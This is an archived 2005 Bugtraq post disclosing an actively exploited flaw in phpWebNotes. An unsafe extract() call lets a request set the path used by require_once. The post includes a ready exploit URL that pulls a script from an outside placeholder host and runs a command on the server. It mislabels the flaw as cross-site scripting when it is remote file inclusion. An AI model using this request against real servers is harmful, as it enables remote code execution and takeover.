Bugtraq mailing list archives
XSS security hole in phpwebnotes.
From: nf2 <nf2 () scheinwelt at>
Date: Sat, 27 Aug 2005 11:19:22 +0200
Hi security team! I have found a security hole in a popular php application (notmaintained anymore). The hole already gets exploited - our server was hacked that way two days ago. Probably hackers just use google to find installations of phpwebnotes.
Version: phpWebNotes-2.0.0-pr1.tar.gz (last) ---------------------------------------------------------------------- the bug is in php_api.php line 77: extract($REQUEST); this allowes to change $t_path_core which is used in api.php: require_once( $t_path_core . 'constants_inc.php' ); this can be used for a cross site scripting attack. how does it work: GET http://server/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id ----------------------------------------------------------------------- http://www.futureware.biz/webnotes/ http://sourceforge.net/projects/webnotes/ regards, Norbert
Current thread:
- XSS security hole in phpwebnotes. nf2 (Aug 27)